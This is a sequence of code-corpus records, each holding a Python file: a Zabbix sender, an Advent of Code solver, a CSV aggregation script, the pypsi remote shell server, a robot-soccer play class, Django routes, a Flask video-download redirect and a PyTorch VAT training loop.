self._refresh()\n","sub_path":"graphalchemy/generics/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"285359552","text":"\"\"\"Zabbix module\"\"\"\n\nimport logging\nimport socket\nfrom zabbix.sender import ZabbixMetric, ZabbixSender\n\nclass Zabbix:\n\tdef __init__(self, server):\n\t\tself.server = server\n\n\tdef send(self, host, item, value):\n\t\tif value == None:\n\t\t\tvalue = 0\n\n\t\ttry:\n\t\t\tm = [ ZabbixMetric(socket.getfqdn(), item, value), ]\n\t\t\tz = ZabbixSender(zabbix_server=self.server).send(m)\n\t\texcept Exception as e:\n\t\t\tlogging.info(\"[Zabbix] Generic exception: %s\" % str(e))\n","sub_path":"sensor/Zabbix.py","file_name":"Zabbix.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"53925544","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport heapq\nimport sys\n\n\"\"\"\nYou talk to the Elves while you wait for your navigation system to\ninitialize. To pass the time, they introduce you to their favorite\nmarble game.\n\nThe Elves play this game by taking turns arranging the marbles in\na circle according to very particular rules. The marbles are numbered\nstarting with 0 and increasing by 1 until every marble has a number.\n\nFirst, the marble numbered 0 is placed in the circle. At this point,\nwhile it contains only a single marble, it is still a circle: the\nmarble is both clockwise from itself and counter-clockwise from\nitself. This marble is designated the current marble.\n\nThen, each Elf takes a turn placing the lowest-numbered remaining\nmarble into the circle between the marbles that are 1 and 2 marbles\nclockwise of the current marble. (When the circle is large enough,\nthis means that there is one marble between the marble that was\njust placed and the current marble.) The marble that was just placed\nthen becomes the current marble.\n\nHowever, if the marble that is about to be placed has a number which\nis a multiple of 23, something entirely different happens. First,\nthe current player keeps the marble they would have placed, adding\nit to their score. In addition, the marble 7 marbles counter-clockwise\nfrom the current marble is removed from the circle and also added\nto the current player's score. The marble located immediately\nclockwise of the marble that was removed becomes the new current\nmarble.\n\nFor example, suppose there are 9 players. After the marble with\nvalue 0 is placed in the middle, each player (shown in square\nbrackets) takes a turn. The result of each of those turns would\nproduce circles of marbles like this, where clockwise is to the\nright and the resulting current marble is in parentheses:\n\n[-] (0)\n[1] 0 (1)\n[2] 0 (2) 1 \n[3] 0 2 1 (3)\n[4] 0 (4) 2 1 3 \n[5] 0 4 2 (5) 1 3 \n[6] 0 4 2 5 1 (6) 3 \n[7] 0 4 2 5 1 6 3 (7)\n[8] 0 (8) 4 2 5 1 6 3 7 \n[9] 0 8 4 (9) 2 5 1 6 3 7 \n[1] 0 8 4 9 2(10) 5 1 6 3 7 \n[2] 0 8 4 9 2 10 5(11) 1 6 3 7 \n[3] 0 8 4 9 2 10 5 11 1(12) 6 3 7 \n[4] 0 8 4 9 2 10 5 11 1 12 6(13) 3 7 \n[5] 0 8 4 9 2 10 5 11 1 12 6 13 3(14) 7 \n[6] 0 8 4 9 2 10 5 11 1 12 6 13 3 14 7(15)\n[7] 0(16) 8 4 9 2 10 5 11 1 12 6 13 3 14 7 15 \n[8] 0 16 8(17) 4 9 2 10 5 11 1 12 6 13 3 14 7 15 \n[9] 0 16 8 17 4(18) 9 2 10 5 11 1 12 6 13 3 14 7 15 \n[1] 0 16 8 17 4 18 9(19) 2 10 5 11 1 12 6 13 3 14 7 15 \n[2] 0 16 8 17 4 18 9 19 2(20)10 5 11 1 12 6 13 3 14 7 15 \n[3] 0 16 8 17 4 18 9 19 2 20 10(21) 5 11 1 12 6 13 3 14 7 15 \n[4] 0 16 8 17 4 18 9 19 2 20 10 21 5(22)11 1 12 6 13 3 14 7 15 \n[5] 0 16 8 17 4 18(19) 2 20 10 21 5 22 11 1 12 6 13 3 14 7 15 \n[6] 0 16 8 17 4 18 19 2(24)20 10 21 5 22 11 1 12 6 13 3 14 7 15 \n[7] 0 16 8 17 4 18 19 2 24 20(25)10 21 5 22 11 1 12 6 13 3 14 7 15\n\nThe goal is to be the player with the highest score after the last marble is used up. 
Assuming the example above ends after the marble numbered 25, the winning score is 23+9=32 (because player 5 kept marble 23 and removed marble 9, while no other player got any points in this very short example game).\n\nHere are a few more examples:\n\n10 players; last marble is worth 1618 points: high score is 8317\n13 players; last marble is worth 7999 points: high score is 146373\n17 players; last marble is worth 1104 points: high score is 2764\n21 players; last marble is worth 6111 points: high score is 54718\n30 players; last marble is worth 5807 points: high score is 37305\n\nWhat is the winning Elf's score?\n\"\"\"\n\n\nclass Marbles(object):\n\n def __init__(this, nplayers, nrounds):\n this.nplayers = nplayers\n this.nrounds = nrounds\n this.scores = [0] * this.nplayers\n this.board = [0]\n this.cur = 0\n this.turn = -1\n this.next = 1\n\n def __str__(this):\n ret = '[%d]' % (this.turn + 1)\n for i in range(len(this.board)):\n if i == this.cur:\n ret += ' (%d)' % this.board[i]\n else:\n ret += ' %d' % this.board[i]\n return ret\n\n def Turn(this):\n this.turn = (this.turn + 1) % this.nplayers\n if this.next % 23 == 0:\n drop = this.cur - 7\n if drop < 0:\n drop += len(this.board)\n this.scores[this.turn] += this.next + this.board[drop]\n this.board = this.board[0:drop] + this.board[drop+1:]\n this.cur = drop\n else:\n ins_before = (this.cur + 2) % len(this.board)\n if ins_before == 0:\n this.board.append(this.next)\n this.cur = len(this.board) - 1\n else:\n b = this.board[0:ins_before] \n b.append(this.next)\n b.extend(this.board[ins_before:])\n this.board = b\n this.cur = ins_before\n this.next += 1\n\n def results(this):\n m = 0\n i_m = 0\n for i in range(this.nplayers):\n if this.scores[i] > m:\n i_m = i\n m = this.scores[i]\n print('%d players; last=%d points, high score is %d' % (\n this.nplayers, this.nrounds, m))\n\n\ndef part1():\n game = Marbles(9, 25)\n print(game)\n for i in range(25):\n game.Turn()\n print(game)\n game.results()\n game = Marbles(30, 5807)\n for i in range(game.nrounds):\n game.Turn()\n game.results()\n game = Marbles(419, 7105200)\n for i in range(game.nrounds):\n game.Turn()\n game.results()\n\n \n\n\nif __name__ == '__main__':\n verbose = False\n iarg = 1\n if len(sys.argv) > 1 and sys.argv[iarg] == '-v':\n verbose = True\n iarg += 1\n part1()\n","sub_path":"2018/09/day9_array.py","file_name":"day9_array.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
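The `Marbles` class above keeps the circle in a Python list, so every insertion and removal is O(n) and the 7,105,200-marble game in `part1` crawls. The standard speed-up for this puzzle keeps the current marble at the right end of a `collections.deque` and rotates instead of slicing; a sketch:

```python
from collections import deque

def high_score(nplayers, last_marble):
    scores = [0] * nplayers
    circle = deque([0])           # current marble is the rightmost element
    for marble in range(1, last_marble + 1):
        if marble % 23 == 0:
            circle.rotate(7)      # step 7 marbles counter-clockwise
            scores[marble % nplayers] += marble + circle.pop()
            circle.rotate(-1)     # marble clockwise of the removed one becomes current
        else:
            circle.rotate(-1)     # step 1 marble clockwise
            circle.append(marble)
    # player attribution is modulo-shifted, which does not affect the max
    return max(scores)

assert high_score(9, 25) == 32         # example from the puzzle text above
assert high_score(10, 1618) == 8317    # first of the extra examples
```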
+{"seq_id":"435043625","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 21 08:09:46 2020\n\n@author: Jiwoo Ahn\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport os\nimport glob\nfrom pathlib import Path\nfrom tkinter import filedialog\nfrom tkinter import *\nroot = Tk()\n\n# Make it almost invisible - no decorations, 0 size, top left corner.\nroot.overrideredirect(True)\nroot.geometry('0x0+0+0')\n\n# Show window again and lift it to top so it can get focus,\n# otherwise dialogs will end up behind the terminal.\nroot.deiconify()\nroot.lift()\nroot.focus_force()\n# File dialog to pick folder directory where the results .csv files are saved\nfolderpath = filedialog.askdirectory()\nsavepath = str(Path(folderpath).parents[0]) + \"\\\\\"\n# Get rid of the top-level instance once to make it actually invisible.\nroot.destroy()\n# Read all .csv files in specified folder\nall_files = sorted(glob.glob(folderpath + '/'+'*.csv'), key=lambda x: int(os.path.basename(x).split('.')[0].split('_')[1]))\n\n# Returns the maximum result (i.e. Compression check or steel area) of all stages\ndef MaxResult(savepath, all_files, filename):\n df = pd.concat((pd.read_csv(f,header = 0) for f in all_files),axis=1,sort=False)\n col = df.columns.tolist()[0:8]\n df = df.fillna(0)\n df = df.groupby(df.columns, axis=1, sort=False).agg(np.max)\n fname = savepath + filename+\".csv\"\n df.to_csv(fname,index=False)\n return df, col\n# File name suffix\nsuffix = '_RC1-RA2'\n\n# Compares the Crushing (MPa), Ast (mm2) and Asv (mm2/m2) and gives you the highest value\nres = MaxResult(savepath, all_files, 'MaxResults'+suffix)","sub_path":"SandwichMax.py","file_name":"SandwichMax.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"389244127","text":"#\n# Copyright (c) 2014, Adam Meily\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice, this\n# list of conditions and the following disclaimer in the documentation and/or\n# other materials provided with the distribution.\n#\n# * Neither the name of the {organization} nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\nimport threading\nimport sys\nimport json\nfrom io import StringIO\nimport select\nimport socket\nfrom pypsi.remote.session import RemotePypsiSession, ConnectionClosed\nfrom pypsi.remote import protocol as proto\nimport builtins\nimport readline\n\ndef server_print(*msg):\n #pass\n print(file=sys.stdout._get_root(), *msg)\n\n\nclass ThreadProxy(object):\n\n def __init__(self, orig):\n self._lock = threading.Lock()\n self._root = threading.get_ident()\n self._proxies = {}\n self._register_proxy(orig)\n\n def _register_proxy(self, obj):\n self._lock.acquire()\n self._proxies[threading.get_ident()] = obj\n self._lock.release()\n #if obj != sys.stdout:\n # server_print(\"register_proxy(\", threading.get_ident(), \") =\", obj)\n\n def _deregister_proxy(self):\n self._lock.acquire()\n if threading.get_ident() in self._proxies:\n del self._proxies[threading.get_ident()]\n self._lock.release()\n\n def __call__(self, *args, **kwargs):\n return self._get(threading.get_ident())(*args, **kwargs)\n\n def _get(self, id):\n return self._proxies[id]\n\n def _get_root(self):\n return self._proxies[self._root]\n\n def __getattr__(self, name):\n if threading.get_ident() in self._proxies:\n return getattr(self._proxies[threading.get_ident()], name)\n raise AttributeError(\"no proxy for current thread\")\n\n def __setattr__(self, name, value):\n if name in ('_lock', '_root', '_proxies'):\n super(ThreadProxy, self).__setattr__(name, value)\n elif threading.get_ident() in self._proxies:\n setattr(self.proxiesp[threading.get_ident()], name, value)\n else:\n raise AttributeError(\"no proxy for current thread\")\n\n\nclass SessionFileObjProxy(object):\n\n def __init__(self, session, isatty=True):\n self._isatty = isatty\n self._session = session\n self._buffer = StringIO()\n\n def __getattr__(self, name):\n return getattr(self._session.socket, name)\n\n def __setattr__(self, name, value):\n if name in ('_session', '_buffer', '_isatty'):\n 
super(SessionFileObjProxy, self).__setattr__(name, value)\n else:\n return setattr(self._session.socket, name, value)\n\n def write(self, s):\n #server_print(\"write():\", s)\n self._buffer.write(s)\n c = len(s)\n if '\\n' in s:\n self.flush()\n return c\n\n def flush(self):\n #server_print(\"flush:\", self._buffer.tell())\n if self._buffer.tell() != 0:\n t = self._buffer.getvalue()\n try:\n self._session.sendmsg(proto.ShellOutputResponse(t))\n except ConnectionClosed:\n raise EOFError\n self._buffer = StringIO()\n\n def isatty(self):\n return self._isatty\n\n def close(self):\n self.flush()\n\n\nclass ServerWorker(threading.Thread, RemotePypsiSession):\n\n def __init__(self, socket, shell_ctor):\n threading.Thread.__init__(self)\n RemotePypsiSession.__init__(self, socket)\n self.running = False\n self.shell_ctor = shell_ctor\n # self.fp = open('out.txt', 'w')\n\n def setup(self):\n self.buffer = StringIO()\n self.stdout = SessionFileObjProxy(self)\n self.queue = []\n self.running = True\n builtins.input._register_proxy(self.input)\n sys.stdout._register_proxy(self.stdout)\n sys.stderr._register_proxy(self.stdout)\n #sys.stdin._register_proxy(self.stdin)\n\n self.completer = None\n readline.set_completer._register_proxy(self.set_completer)\n readline.get_completer._register_proxy(lambda: self.completer)\n readline.get_begidx._register_proxy(lambda: self.begidx)\n readline.get_endidx._register_proxy(lambda: self.endidx)\n readline.get_line_buffer._register_proxy(lambda: self.line_buffer)\n\n def set_completer(self, c):\n self.completer = c\n\n def get_completions(self, line, prefix):\n completions = []\n if self.completer:\n self.line_buffer = line\n self.begidx = len(line) - len(prefix)\n self.endidx = len(line)\n i = 0\n while True:\n c = self.completer(line, i)\n i += 1\n if c is not None:\n completions.append(c)\n else:\n break\n return completions\n\n def run(self):\n self.setup()\n self.on_connect()\n try:\n self.shell = self.shell_ctor()\n self.shell.cmdloop()\n except ConnectionClosed:\n pass\n except:\n import traceback\n server_print(traceback.format_exc())\n finally:\n self.on_disconnect()\n self.cleanup()\n self.running = False\n\n return 0\n\n def flush_stdout(self):\n try:\n self.stdout.flush()\n except ConnectionClosed:\n raise EOFError\n\n def handle(self, msg):\n if isinstance(msg, proto.InputResponse):\n pass\n elif isinstance(msg, proto.CompletionRequest):\n pass\n else:\n pass\n\n def send_json(self, obj):\n # self.fp.write(str(obj))\n # self.fp.write('\\n')\n # self.fp.flush()\n return super().send_json(obj)\n\n def input(self, msg=''):\n self.flush_stdout()\n\n try:\n self.sendmsg(proto.InputRequest(msg))\n except ConnectionClosed:\n raise EOFError\n\n while True:\n msg = None\n try:\n msg = self.recvmsg()\n except proto.InvalidMessageError:\n return ''\n except ConnectionClosed:\n raise EOFError\n\n if isinstance(msg, proto.InputResponse):\n if msg.sig:\n if msg.sig == 'int':\n raise KeyboardInterrupt\n elif msg.sig == 'eof':\n raise EOFError\n return msg.input\n elif isinstance(msg, proto.CompletionRequest):\n try:\n self.sendmsg(\n proto.CompletionResponse(\n self.get_completions(msg.input, msg.prefix)\n )\n )\n except ConnectionClosed:\n raise EOFError\n else:\n return ''\n\n def stop(self):\n #server_print(\"stopping...\")\n self.running = False\n\n def cleanup(self):\n sys.stdout._deregister_proxy()\n sys.stderr._deregister_proxy()\n builtins.input._deregister_proxy()\n self.socket.close()\n # self.fp.close()\n #server_print(\"ServerWorker.cleanup()\")\n\n def 
on_connect(self):\n pass\n\n def on_disconnect(self):\n pass\n\n\nclass ShellServer(object):\n\n def __init__(self, port, shell_ctor):\n self.port = port\n self.shell_ctor = shell_ctor\n self.threads = []\n self.running = False\n self.clients = {}\n\n def run(self):\n self.running = True\n sys.stdout = ThreadProxy(sys.stdout)\n sys.stderr = sys.stdout\n readline.set_completer = ThreadProxy(readline.set_completer)\n readline.get_completer = ThreadProxy(readline.get_completer)\n readline.get_begidx = ThreadProxy(readline.get_begidx)\n readline.get_endidx = ThreadProxy(readline.get_endidx)\n readline.get_line_buffer = ThreadProxy(readline.get_line_buffer)\n builtins.input = ThreadProxy(builtins.input)\n\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.socket.bind(('0.0.0.0', self.port))\n self.socket.listen(5)\n\n try:\n while self.running:\n if self.poll():\n (sock, addr) = self.socket.accept()\n print(\"Client connected:\", addr[0])\n self.spawn(sock, addr)\n else:\n self.purge()\n except KeyboardInterrupt:\n self.stop()\n except:\n import traceback\n print(traceback.format_exc())\n self.stop()\n\n self.cleanup()\n return 0\n\n def poll(self):\n fd = self.socket.fileno()\n (read, write, err) = select.select([fd], [], [fd], 0.5)\n if read or err:\n return True\n return False\n\n def spawn(self, sock, addr):\n t = ServerWorker(\n sock,\n self.shell_ctor\n )\n self.threads.append(t)\n t.start()\n self.clients[t.ident] = addr\n #server_print(\"spawn:\", t.ident, \"(\", threading.get_ident(), \")\")\n\n def cleanup(self):\n #print(\"ShellServer.cleanup()\")\n for t in self.threads:\n t.stop()\n\n for t in self.threads:\n t.join()\n\n self.threads = []\n\n def stop(self):\n #server_print(\"ShellServer.stop()\")\n self.running = False\n\n def purge(self):\n old = [t for t in self.threads if not t.is_alive()]\n for t in old:\n self.threads.remove(t)\n print(\"Client disconnected:\", self.clients[t.ident][0])\n del self.clients[t.ident]\n #server_print(\"purging:\", t.ident)\n del t\n\n","sub_path":"pypsi/remote/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":10968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
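The interesting piece of this record is `ThreadProxy`, which lets one process host many shell sessions by routing attribute access on shared globals (`sys.stdout`, `builtins.input`, the `readline` hooks) to a per-thread object. A stripped-down, self-contained sketch of the same idea, minus the locking and deregistration of the original:

```python
import io
import sys
import threading

class MiniThreadProxy:
    """Route attribute access to whichever object the current thread registered."""

    def __init__(self, root):
        self._root_id = threading.get_ident()
        self._proxies = {self._root_id: root}

    def register(self, obj):
        self._proxies[threading.get_ident()] = obj

    def __getattr__(self, name):
        # Unregistered threads fall back to the root object.
        target = self._proxies.get(threading.get_ident(), self._proxies[self._root_id])
        return getattr(target, name)

sys.stdout = MiniThreadProxy(sys.stdout)

def worker():
    buf = io.StringIO()
    sys.stdout.register(buf)           # this thread's prints now land in buf
    print("hello from worker")
    assert buf.getvalue() == "hello from worker\n"

t = threading.Thread(target=worker)
t.start()
t.join()
sys.stdout = sys.stdout._proxies[sys.stdout._root_id]  # restore the real stdout
```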
+{"seq_id":"383140815","text":"import play\nimport ui.main\nimport tactics\n\n\n## @brief A standardized play that handles actions that an average play needs\n# Right now, this is only used to implement a standard way to run or not run\n# the play with defense, but any action that a normal play should do can be \n# placed here\nclass StandardPlay(play.Play):\n\n #Performs actions that all \"Standard Plays\" should do on initialization\n #Note: This method is called many times during the duration of a play,\n #Not just on selection\n def __init__(self, continuous):\n super().__init__(continuous)\n self.use_standard_defense()\n\n #If the \"Use Defense\" checkbox is checked and the play isn't already running\n #defense, then it adds the defense behavior. If the box isn't checked and the\n #play is running defense then it removes the behavior. Also note: it ignores\n #the requirement for goalie if the box is checked.\n def use_standard_defense(self):\n if ui.main.defenseEnabled() and not self.has_subbehavior_with_name(\n 'defense'):\n self.add_subbehavior(tactics.defense.Defense(),\n 'defense',\n required=False)\n elif not ui.main.defenseEnabled():\n if self.has_subbehavior_with_name('defense'):\n self.remove_subbehavior('defense')\n\n #Handles activity while the play is active. A play wishing to utilize this\n #method in additionto having an \"execute_running\" method of its own must call\n #it via super\n def execute_running(self):\n self.use_standard_defense()\n\n #Since the standard_play handles defense, it will always handle the goalie\n @classmethod\n def handles_goalie(cls):\n return True\n","sub_path":"soccer/gameplay/standard_play.py","file_name":"standard_play.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"352929433","text":"from django.conf.urls import url\nfrom .import views\n\nurlpatterns = [\n url(r'^$', views.index, name=\"index\"),\n url(r'^register$', views.register, name=\"register\"),\n url(r'^login$', views.login, name=\"login\"),\n url(r'^logout$', views.logout, name=\"logout\"),\n url(r'^success$', views.success, name=\"success\"),\n url(r'^books/add$', views.display_add, name=\"display_add\"),\n url(r'^books/add_books$', views.add, name=\"add\"),\n url(r'^books/add_review/(?P\\d+)$', views.add_review, name=\"add_review\"),\n url(r'^books/(?P\\d+)$', views.book, name=\"book\"),\n url(r'^books/delete/(?P\\d+)$', views.delete_review, name=\"delete_review\"),\n url(r'^users/(?P\\d+)$', views.view_user, name=\"view_user\"),\n]","sub_path":"django/full_stack_django/belt_reviewer/apps/belt_reviewer_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"408418819","text":"from flask import Flask , render_template , request , redirect\nimport youtube_dl\n\napp = Flask(__name__)\n@app.route('/')\n\ndef index():\n\n return render_template('index.html')\n\n@app.route('/' , methods=['POST'])\n@app.route('/download', methods=[\"POST\", \"GET\"])\ndef link():\n\turl = request.form[\"url\"]\n\twith youtube_dl.YoutubeDL() as ydl:\n\t\turl = ydl.extract_info(url, download=False)\n\t\ttry:\n\t\t\tdownload_link = url[\"entries\"][-1][\"formats\"][-1][\"url\"]\n\t\texcept:\n\t\t\tdownload_link = url[\"formats\"][-1][\"url\"]\n\t\treturn redirect(download_link+\"&dl=1\")\n\nif __name__ == '__main__':\n app.run(port= 8080)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"526456472","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 15 15:58:01 2019\n\n@author: Austin Hsu\n\"\"\"\n\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms\nimport torch.utils.data as data_utils\nimport numpy as np\nimport random\nimport math\nimport copy\nimport torch.nn.functional as F\n\nfrom train_modules.audio_augment import transform_method\nfrom train_modules.VAT import VATLoss\n\ndef train_resnet_4loss_VAT(input_t, target_Var, decoders, dec_opts, device,\n loss_funcs, INPUT_SIZE, OUTPUT_SIZE, BATCH_SIZE, k,\n unlabel_t, unlabel_lambda,\n ):\n \n # input_t shape: (1,3,522,data_length)\n # target_Var shape: (1,data_length,6)\n # unlabel_t shape: (1,3,522,unlabel_data_length)\n \n # encoder: Encoder\n # decoder: AttentionClassifier\n onDec = decoders[0]\n onDecOpt = dec_opts[0]\n onLossFunc = loss_funcs[0] #CrossEntropyLoss_for_MixMatch()\n smLossFunc = VATLoss()\n enLossFunc = EntropyLoss()\n\n input_time_step = input_t.size()[3]\n unlabel_time_step = unlabel_t.size()[3]\n\n window_size = 2*k+1\n \n totLoss = 0\n\n nn_softmax = nn.Softmax(dim=1)\n\n for step in range(k, input_time_step - k - BATCH_SIZE + 1, BATCH_SIZE): \n \n # --- Loss ---\n super_Loss = 0\n smsup_Loss = 0\n en_Loss = 0\n onLoss = 0 \n \n # --- Data Collection --- \n x_unmix_data = torch.stack([ input_t[0, :, :, step+i-k:step+i-k+window_size] for i in range(BATCH_SIZE)], dim=0)\n random_position = torch.randperm(unlabel_time_step-1-window_size)[:BATCH_SIZE]\n if step+BATCH_SIZE-k+window_size < unlabel_time_step:\n u_unmix_data = torch.stack([ unlabel_t[0, :, :, step+i-k:step+i-k+window_size] for i in range(BATCH_SIZE)], dim=0)\n else:\n u_unmix_data = torch.stack([ unlabel_t[0, :, :, random_position[i]:random_position[i]+window_size] for i in range(BATCH_SIZE)], dim=0)\n \n # ---Data Preprocessing ---\n x_mix_data, u_mix_data, x_mix_label = DataPreprocess(labeled_data=x_unmix_data,\n labeled_label=target_Var[:, step:step+BATCH_SIZE],\n unlabeled_data=u_unmix_data,\n device=device\n )\n \n # --- Pseudo Label ---\n # mix_label = torch.cat((x_mix_label, u_mix_label), dim=0)\n \n # --- Variable ---\n x_mix_data = Variable(x_mix_data)\n u_mix_data = Variable(u_mix_data)\n x_mix_label = Variable(x_mix_label) ###\n \n # --- Run Model ---\n onDecOut_mix = onDec(torch.cat((x_mix_data, u_mix_data),dim=0)) #onDec(x_mix_data) \n onDecOut6 = onDecOut_mix[:BATCH_SIZE]\n \n # === labeled ===\n onDecOut1 = nn_softmax(onDecOut6[:, :2])\n onDecOut2 = nn_softmax(onDecOut6[:, 2:4])\n onDecOut3 = nn_softmax(onDecOut6[:, 4:])\n \n temp_t = torch.max(onDecOut2[:, 1], onDecOut3[:, 1]).view(-1,1)\n onDecOut4 = torch.cat((onDecOut1, temp_t), dim=1)\n \n # --- Loss --- \n # === Supervised Loss ===\n super_Loss += onLossFunc(onDecOut1.view(-1, 2), x_mix_label[:, :2].contiguous().view(-1, 2))\n super_Loss += onLossFunc(onDecOut2.view(-1, 2), x_mix_label[:, 2:4].contiguous().view(-1, 2))\n super_Loss += onLossFunc(onDecOut3.view(-1, 2), x_mix_label[:, 4: ].contiguous().view(-1, 2))\n target_T = torch.max(x_mix_label[:, 3], x_mix_label[:, 5])\n super_Loss += onLossFunc(onDecOut4.view(-1, 3), torch.cat((x_mix_label[:, :2].contiguous().view(-1, 2), \n target_T.contiguous().view(-1, 1)), 1)) \n \n # === Entropy Minimization ===\n # --- labeled ---\n en_Loss += enLossFunc(onDecOut1.view(-1, 2))\n en_Loss += enLossFunc(onDecOut2.view(-1, 2))\n en_Loss += enLossFunc(onDecOut3.view(-1, 2))\n # --- unlabeled ---\n 
onDecOut1_u = nn_softmax(onDecOut_mix[BATCH_SIZE:, :2])\n onDecOut2_u = nn_softmax(onDecOut_mix[BATCH_SIZE:, 2:4])\n onDecOut3_u = nn_softmax(onDecOut_mix[BATCH_SIZE:, 4:])\n en_Loss += enLossFunc(onDecOut1_u.view(-1, 2))\n en_Loss += enLossFunc(onDecOut2_u.view(-1, 2))\n en_Loss += enLossFunc(onDecOut3_u.view(-1, 2))\n \n # === VAT Loss ===\n smsup_Loss += smLossFunc(onDec, u_mix_data) #torch.cat((x_mix_data, u_mix_data),dim=0)\n \n print('supervised_Loss: %.10f' % (super_Loss.item() / input_time_step), 'semi-supervised_Loss: %.10f' % (unlabel_lambda * smsup_Loss.item() / input_time_step)) #'entropy_Loss: %.10f' % (en_Loss.item() / input_time_step)\n onLoss = super_Loss + unlabel_lambda * smsup_Loss + en_Loss\n onDecOpt.zero_grad()\n onLoss.backward()\n onDecOpt.step()\n totLoss += onLoss.item()\n \n return totLoss / input_time_step \n\ndef DataPreprocess(labeled_data, labeled_label,\n unlabeled_data,\n device,\n transform_dict={'cutout' :False, #{'n_holes':1, 'height':50, 'width':5}, \n 'freq_mask' :{'freq_mask_param':100},\n 'time_mask' :False, #{'time_mask_param':5},\n 'pitchshift':{'shift_range':48}, \n 'addnoise' :False, #{'noise_type':'pink', 'noise_size':0.01}, \n },\n augment_time=1,\n ):\n \n # labeled_data shape: (batchsize, 9, 174, 19)\n # labeled_label shape: (batchsize, 6)\n # unlabeled_data shape: (batchsize, 9, 174, 19)\n \n # --- Setup Augmentation Methods ---\n transform = transform_method(transform_dict)\n \n # --- Normalization ---\n labeled_data = Normalize(labeled_data)\n unlabeled_data = Normalize(unlabeled_data)\n \n # --- Labeled Augmentation ---\n aug_x = transform(labeled_data)\n label_x = labeled_label[0]\n \n # --- Unlabeled Augmentation ---\n aug_u = transform(unlabeled_data)\n \n # --- Shuffle ---\n shuffle = torch.randperm(aug_x.size(0))\n shuffle2 = torch.randperm(aug_u.size(0))\n aug_x = aug_x[shuffle]\n aug_u = aug_u[shuffle2]\n label_x = label_x[shuffle]\n \n # --- CUDA ---\n aug_x = aug_x.to(device)\n aug_u = aug_u.to(device)\n labeled_label = labeled_label.to(device, non_blocking=True)\n \n return aug_x, aug_u, label_x\n\ndef Normalize(data):\n # Batchwise normalization (test)\n return (data-torch.mean(data))/torch.std(data)\n \nclass EntropyLoss(nn.Module):\n def __init__(self, entmin_weight=1.0):\n super(EntropyLoss, self).__init__()\n self.entmin_weight = entmin_weight\n def forward(self, softmax_x):\n return -self.entmin_weight * torch.mean(softmax_x * torch.log(softmax_x)) \n","sub_path":"src/train_modules/train_sdt6_resnet_VAT.py","file_name":"train_sdt6_resnet_VAT.py","file_ext":"py","file_size_in_byte":7118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
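A detail worth calling out in this record: `Normalize()` standardizes each batch with a single global mean and standard deviation, not per channel or per sample. A standalone check of that behavior (the tensor shape matches the comments in `DataPreprocess`):

```python
import torch

# Global standardization: one mean/std over ALL elements of the batch.
data = torch.randn(4, 9, 174, 19)
normed = (data - torch.mean(data)) / torch.std(data)
assert abs(normed.mean().item()) < 1e-4        # centered at zero
assert abs(normed.std().item() - 1.0) < 1e-4   # unit standard deviation
```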
